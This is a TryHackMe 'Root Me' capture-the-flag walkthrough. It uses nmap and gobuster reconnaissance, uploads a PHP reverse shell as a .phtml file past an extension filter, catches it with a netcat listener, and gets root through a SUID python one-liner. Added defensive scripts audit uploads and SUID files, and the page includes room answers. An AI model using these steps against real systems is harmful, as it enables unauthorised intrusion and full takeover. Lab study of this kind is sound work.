# Root Me

**Date :** 8th November, 2021

**Author :** Dhaval Kotak

**Room :** [Root Me](https://tryhackme.com/room/rrootme)

## Reconnaissance

```shell
nanomite @ zeus in ~/thm/rootme
⚡️ nmap -A 10.10.237.244 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 22:47 IST
Nmap scan report for 10.10.237.244
Host is up (0.40s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.96 seconds
```

Scan the machine, how many ports are open?

**2**

What version of Apache is running?

**2.4.29**

What service is running on port 22?

**ssh**

Find directories on the web server using the GoBuster tool.

```shell
nanomite @ zeus in ~/thm/rootme
⚡️ gobuster dir -u http://10.10.237.244 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.237.244
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/08 22:50:57 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.237.244/css/]
/index.php            (Status: 200) [Size: 616]                                
/js                   (Status: 301) [Size: 311] [--> http://10.10.237.244/js/] 
/panel                (Status: 301) [Size: 314] [--> http://10.10.237.244/panel/]
/server-status        (Status: 403) [Size: 278]                                  
/uploads              (Status: 301) [Size: 316] [--> http://10.10.237.244/uploads/]
                                                                                   
===============================================================
2021/11/08 22:54:38 Finished
===============================================================
```

What is the hidden directory?

**/panel/**

## **Getting A Shell**

First, visit `http://IP_ADDR/panel/`

The website does not allow uploading files with `.php` extension.

So I tried other extensions used for PHP files, and `.phtml` works. Upload a PHP reverse shell with a `.phtml` extension through the form.
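Why the `.php`-only denylist fails, as an added example that is not part of this writeup: a denylist modelled on the upload form's behaviour described above, an allowlist check that rejects `.phtml` and double extensions, and a check against the `FilesMatch` pattern Debian/Ubuntu's `libapache2-mod-php` configuration uses (`.+\.ph(ar|p|tml)$`), which is why a `.phtml` upload is executed. The accepted image extensions and the `audit_uploads` helper are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not code from the original writeup: why a ".php"-only
# denylist is bypassed by ".phtml", and what an allowlist looks like instead.
# Each check takes a filename and returns 0 (accept) or 1 (reject).

# Pattern used by Debian/Ubuntu's libapache2-mod-php configuration to decide
# which files are handed to the PHP interpreter; .phtml and .phar qualify too.
PHP_HANDLER_RE='.+\.ph(ar|p|tml)$'

# Denylist check modelled on the upload form described above: only the
# literal ".php" suffix is rejected, so "shell.phtml" passes.
denylist_check() {
    case "$1" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# Allowlist check: accept only a lower-cased, single-extension image name.
# The accepted extensions are an assumption for the example.
allowlist_check() {
    name=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$name" in
        */*|*..*) return 1 ;;   # no path separators or traversal
        *.*.*)    return 1 ;;   # no double extensions such as shell.php.jpg
        *.jpg|*.jpeg|*.png|*.gif) return 0 ;;
        *)        return 1 ;;
    esac
}

# Would Apache (with the configuration above) execute this file as PHP?
executed_by_php() {
    printf '%s\n' "$1" | grep -Eq "$PHP_HANDLER_RE"
}

# Detection: list files in an upload directory that PHP would execute.
# Prints the offending paths and returns 1 if any were found.
audit_uploads() {
    found=$(find "$1" -type f | grep -E "$PHP_HANDLER_RE" || true)
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 1
    fi
    return 0
}

# Demonstration on a few constructed file names.
for f in shell.php shell.phtml shell.php.jpg photo.jpg; do
    denylist_check "$f"  && d=accept || d=reject
    allowlist_check "$f" && a=accept || a=reject
    executed_by_php "$f" && e=yes    || e=no
    printf '%-14s denylist=%-6s allowlist=%-6s executed_by_php=%s\n' "$f" "$d" "$a" "$e"
done
```

Run `audit_uploads /var/www/html/uploads` (path assumed) from cron or a CI job to catch interpreter-handled files that slipped past the form; an allowlist on the server side plus a directory with PHP execution disabled is the durable fix, not a longer denylist.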

Open up a netcat listener on your machine: `nc -vlnp 1234`

Now, visit `http://IP_ADDR/php-rev-shell.phtml`

```shell
nanomite @ zeus in ~/thm/rootme
⚡️ nc -lvnp 1234
listening on [any] 1234 ...

connect to [10.17.2.15] from (UNKNOWN) [10.10.237.244] 36914
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Mon Nov 8 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 19:51:37 up 22 min,  0 users,  load average: 0.00, 0.26, 1.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ ^Z
[1]+  Stopped                 nc -lvnp 1234

nanomite @ zeus in ~/thm/rootme
⚡️ stty raw -echo; fg
nc -lvnp 1234

www-data@rootme:/$ id    
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Now find `user.txt`:

```shell
www-data@rootme:/$ find / -type f -name "user.txt" 2>/dev/null
/var/www/user.txt
www-data@rootme:/$ cat /var/www/user.txt                      
THM{REDACTED}
```

## **Privilege Escalation**

Now that we have a shell, let's escalate our privileges to root.

Search for files with SUID permission, which file is weird?

```shell
$ find / -perm -u=s -type f 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
```

**/usr/bin/python**
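How a defender would spot `/usr/bin/python` in that listing, as an added example that is not from the original writeup: compare the host's SUID files against a known-good baseline and report the extras. The baseline file and its path are assumptions (build it from a clean install of the same image); the audit does not filter on owner so that it also runs in an unprivileged test directory.

```shell
#!/bin/sh
# Added example, not code from the original writeup: report SUID files that
# are absent from a known-good baseline. In the listing above, that is how
# /usr/bin/python stands out. The baseline contents are an assumption; build
# the file from a clean install of the same image and keep it read-only.

# Print regular files with the setuid bit under a root (default /), sorted.
# Owner is deliberately not filtered so the audit also runs in an
# unprivileged test directory; on a real host add "-user root".
list_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# Print entries of LISTING ($2) that do not appear in BASELINE ($1), one per
# line. Returns 1 when something unexpected was found, 0 otherwise.
unexpected_suid() {
    extra=$(grep -vxF -f "$1" "$2" || true)
    if [ -n "$extra" ]; then
        printf '%s\n' "$extra"
        return 1
    fi
    return 0
}

# Audit a live tree ($2, default /) against a baseline file ($1).
audit_suid() {
    listing=$(mktemp)
    list_suid "${2:-/}" > "$listing"
    unexpected_suid "$1" "$listing" && rc=0 || rc=$?
    rm -f "$listing"
    return $rc
}

# Usage on a real host (baseline path is a placeholder):
#   audit_suid /etc/security/suid-baseline.txt / && echo "no unexpected SUID files"
```

A non-zero exit from `audit_suid` is what you alert on; an interpreter such as `python` carrying the setuid bit should never be on the baseline, and removing the bit with `chmod u-s` closes this escalation path.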

Find the exploit for the binary on [GTFObins](https://gtfobins.github.io/gtfobins/python/).

```shell
www-data@rootme:/$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# whoami
root
```

Finally, read `root.txt`:

```shell
# cd /root
# ls
root.txt
# cat root.txt
THM{REDACTED}
```
